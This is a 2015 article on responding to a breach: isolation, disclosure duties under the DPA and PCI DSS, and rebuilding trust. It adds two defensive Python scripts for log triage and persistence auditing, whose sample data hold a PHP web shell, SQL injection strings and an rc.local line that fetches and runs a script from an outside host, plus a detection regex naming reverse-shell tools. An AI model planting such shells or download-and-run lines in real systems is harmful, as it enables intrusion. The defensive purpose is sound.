So you've been hacked - what now? by Chloe Green

15/01/2015 06:52

Organisations need to start assuming they will be hacked, and responding accordingly.

In 2011 the UK government estimated that cyber crime costs the UK economy £27 billion a year, and it is doing serious damage to both the public and private sectors. CEOs and the rest of the board shouldn't be asking 'will we get hacked?' but 'when will we get hacked?'. It has become an inevitability, and businesses need to know how to respond.

But when you get hacked, a 'you have been hacked' alert won't suddenly appear on your screen. There may be obvious consequences, such as your website being defaced, but an attacker with intent usually wants to stay unnoticed, so suspicion is more often raised by the subtle and not-so-subtle side effects of the intrusion.

There may be technical indicators such as machines running slowly, accounts not working, software malfunctioning or unexpected activity in system logs. However, unless you are watching diligently for these signs, it is more often than not the perpetrators' other activities (fraud against your customers, or a third party reporting abuse originating from your systems, for example) that first raise suspicion.

What should you do?

Naturally our advice would be to call in the professionals and make sure they are CREST certified, which is the industry standard.


In a recent case we responded to, the company had tried to kick the hackers out before we were called in. This led to a game of cat and mouse and some goading on the part of the attackers.

However, if you can't afford expert help, our first advice would be to isolate the affected systems to reduce further impact. Prefer taking them off the network to powering them off: switching a machine off destroys whatever evidence was held only in memory. Then, if you don't wish to involve law enforcement, attempt to understand how it happened. If you want to call in the police, the crime scene needs to be preserved, so work from copies (disk images) of the affected systems rather than poking at the live ones.

Without understanding how it happened there is a risk you will recover, miss the original entry point and allow the attackers straight back in, causing you further frustration and anxiety. 

What are the laws, and do you need to inform people? 

The Data Protection Act (DPA) does not require you to inform the Information Commissioner's Office (ICO). However, the ICO advises you to inform it in the case of a serious breach; further details can be found in its breach-notification briefing document.

If you process credit card data you'll come under the Payment Card Industry Data Security Standard (PCI DSS). Whilst not a law, it carries a contractual requirement to inform the major card companies (Visa, American Express etc.) within 24 hours of discovering a breach. Visa and MasterCard also require you to undertake a forensic investigation, carried out by an approved PCI Forensic Investigator (PFI).

How do you find out what's gone and how do you plug the hole?

Finding out what went on and how to plug the hole will require the technical capability to comb through available logs and other sources of forensic data. We typically find that SMEs don't proactively configure logging, so they become reliant on the default logs produced by their operating systems, web servers and databases. Only by analysing these will you be able to build up a picture of the activity and identify what was taken. Be prepared, though, not always to be able to answer this question fully, either through lack of logging or because a savvy attacker has erased the logs; unexplained gaps in an otherwise steady log are themselves a finding.
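The kind of triage described above, as an added example that is not part of the original article or NCC Group's own tooling: a short Python script that parses a default Apache/nginx combined-format access log, flags injection strings, known attack-tool user agents and requests served with 200 for scripts that were never deployed (a classic web-shell sign), and reports gaps in the timeline that may indicate deleted log lines. The log lines, the client addresses and the deployed-file manifest are all constructed for the example.

```python
"""Triage a default web-server access log after a suspected intrusion.

Added example, not from the original article or NCC Group. Assumes the
Apache/nginx "combined" log format; SAMPLE_LOG and DEPLOYED are constructed.
"""
import re
from collections import Counter
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed: a small shop's access log with an attacker (198.51.100.22)
# probing for SQL injection, then using an uploaded web shell.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2015:09:01:12 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2015:09:01:15 +0000] "GET /products.php?id=3 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Jan/2015:09:02:03 +0000] "GET /products.php?id=3%27%20OR%201%3D1-- HTTP/1.1" 200 9811 "-" "sqlmap/1.0"
198.51.100.22 - - [10/Jan/2015:09:02:04 +0000] "GET /products.php?id=3%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 311 "-" "sqlmap/1.0"
198.51.100.22 - - [10/Jan/2015:09:02:09 +0000] "GET /admin/ HTTP/1.1" 403 221 "-" "sqlmap/1.0"
198.51.100.22 - - [10/Jan/2015:09:05:41 +0000] "POST /uploads/img.php HTTP/1.1" 200 18 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Jan/2015:09:05:50 +0000] "GET /uploads/img.php?cmd=id HTTP/1.1" 200 61 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2015:09:06:30 +0000] "GET /contact.php HTTP/1.1" 200 1802 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2015:15:20:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# Constructed: the scripts the site is known to ship. Anything else that
# answers with 200 deserves a look, because attackers drop their own files.
DEPLOYED = {"/index.php", "/products.php", "/contact.php", "/admin/"}

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
INJECTION = re.compile(r"('\s*or\s+\d+\s*=\s*\d+|union\s+select|\.\./|[?&]cmd=)", re.I)
TOOL_UA = re.compile(r"(sqlmap|nikto|nmap|masscan|python-requests)", re.I)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["decoded_path"] = unquote(rec["path"])       # undo %27 etc. before matching
    rec["script"] = rec["decoded_path"].split("?", 1)[0]
    return rec


def triage(log_text, deployed=DEPLOYED, max_gap=timedelta(hours=1)):
    """Scan a log and return findings, timeline gaps and a per-IP tally.

    max_gap is the longest silence considered normal for this site; anything
    longer is reported, since an attacker who can write to the server can
    also delete the lines that recorded them.
    """
    findings = []   # (reason, client ip, decoded request)
    gaps = []       # (last entry before the silence, first entry after it)
    prev_ts = None
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            findings.append(("unparseable line", "-", line))
            continue
        if prev_ts is not None and rec["ts"] - prev_ts > max_gap:
            gaps.append((prev_ts, rec["ts"]))
        prev_ts = rec["ts"]
        req = f'{rec["method"]} {rec["decoded_path"]}'
        if INJECTION.search(rec["decoded_path"]):
            findings.append(("injection pattern", rec["ip"], req))
        if TOOL_UA.search(rec["ua"]):
            findings.append(("attack-tool user agent", rec["ip"], req))
        if rec["script"] not in deployed and rec["status"] == 200:
            findings.append(("undeployed script served 200 (possible web shell)", rec["ip"], req))
    suspect_ips = Counter(ip for _, ip, _ in findings if ip != "-")
    return {"findings": findings, "gaps": gaps, "suspect_ips": suspect_ips}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for reason, ip, req in result["findings"]:
        print(f"{ip:15} {reason}: {req}")
    for start, end in result["gaps"]:
        print(f"gap in log: {start:%H:%M:%S} -> {end:%H:%M:%S} (deleted lines?)")
    print("most active suspect:", result["suspect_ips"].most_common(1))
```

Run against the constructed log it attributes all eight findings to 198.51.100.22, pinpoints the first request to the uploaded `img.php` as the moment the site was lost, and reports the six-hour silence in the afternoon, which on a site that otherwise logs continuously is worth checking against the web server's error log and file timestamps. The deployed-file manifest is the most valuable input: keep one for every site, because "a 200 for a script we never shipped" is a far more reliable signal than any pattern list.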


How do you repair systems and rebuild trust?

The general wisdom is to rebuild the affected systems from scratch rather than trying to repair them. In reality, this might not be possible, so it's critical that you have understood how the attacker got in, confirmed the hole is closed and checked that they are not still resident via other mechanisms (added accounts, cron jobs or scheduled tasks, SSH keys, web shells dropped into the web root). Then change all passwords and other credentials, make sure all software is updated and all logging is functioning, and look to rebuild trust in the systems.
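One way to carry out that "not still resident" check, as an added example that is not the article's or NCC Group's own method: diff the host's common persistence locations against a known-good baseline and rank whatever changed. The two snapshots below are constructed dicts of path to file content; on a real engagement the baseline would come from a golden image or configuration management and the current snapshot from the compromised disk, and the list of locations would be extended for the platform (on Windows: Run keys, scheduled tasks, services). The download-and-run one-liner, the extra SSH key, the cron entry in /tmp and the PHP web shell are all invented for the example.

```python
"""Check for attacker persistence by diffing a host's known-good baseline
against what is on it now.

Added example, not from the original article or NCC Group. BASELINE and
CURRENT are constructed path -> content snapshots of the places attackers
commonly leave a way back in (cron, rc.local, SSH keys, the web root).
"""
import difflib
import re

# Constructed: golden-build contents of the locations worth watching.
BASELINE = {
    "/etc/crontab": "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n",
    "/etc/rc.local": "#!/bin/sh -e\nexit 0\n",
    "/home/deploy/.ssh/authorized_keys": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5FAKE deploy@buildhost\n",
    "/var/www/html/index.php": "<?php echo 'shop'; ?>\n",
}

# Constructed: the same locations as collected from the compromised host.
CURRENT = {
    "/etc/crontab": BASELINE["/etc/crontab"],
    "/etc/rc.local": "#!/bin/sh -e\n/usr/bin/curl -s http://203.0.113.5/u.sh | sh\nexit 0\n",
    "/home/deploy/.ssh/authorized_keys": BASELINE["/home/deploy/.ssh/authorized_keys"]
        + "ssh-rsa AAAAB3NzaC1yc2EFAKE mobile@laptop\n",
    "/var/www/html/index.php": BASELINE["/var/www/html/index.php"],
    "/var/www/html/uploads/img.php": "<?php system($_GET['cmd']); ?>\n",
    "/var/spool/cron/crontabs/www-data": "*/10 * * * * /tmp/.x/kthread\n",
}

# Content that should never appear in a persistence location on a production host.
HIGH_RISK = re.compile(
    r"(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"   # download-and-run one-liners
    r"|/(tmp|dev/shm)/"                      # executables living in scratch space
    r"|\$_(GET|POST|REQUEST)\["              # PHP taking commands from the request
    r"|base64\s+-d|nc\s+-e|/dev/tcp/",       # decoders and reverse shells
    re.I,
)


def added_lines(before, after):
    """Lines present in `after` but not in `before` (unified diff, no context)."""
    diff = difflib.unified_diff(before.splitlines(), after.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def audit_persistence(baseline, current):
    """Return (severity, kind, path, detail) for every difference, sorted by path.

    Severity is "high" when the new content matches HIGH_RISK, otherwise
    "review": an unexpected SSH key or cron entry still needs a human to
    confirm who added it and when.
    """
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            findings.append(("review", "removed", path, ""))
            continue
        if path not in baseline:
            kind, detail = "new file", current[path].strip()
        elif baseline[path] != current[path]:
            kind, detail = "modified", "\n".join(added_lines(baseline[path], current[path]))
        else:
            continue
        severity = "high" if HIGH_RISK.search(detail) else "review"
        findings.append((severity, kind, path, detail))
    return findings


if __name__ == "__main__":
    for severity, kind, path, detail in audit_persistence(BASELINE, CURRENT):
        print(f"[{severity:6}] {kind:9} {path}\n    {detail}")
```

On the constructed data this reports four changes, three of them high: the rc.local download-and-run line, the www-data crontab pointing into /tmp and the uploaded shell; the extra key in authorized_keys comes out as "review", which is the right answer because only the deploy team can say whether mobile@laptop belongs to them. Run the audit, then rotate credentials: changing passwords while an attacker still has a cron job or an SSH key on the box only hands them the new ones.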

Sourced from Rob Cotton, CEO at global information assurance firm NCC Group
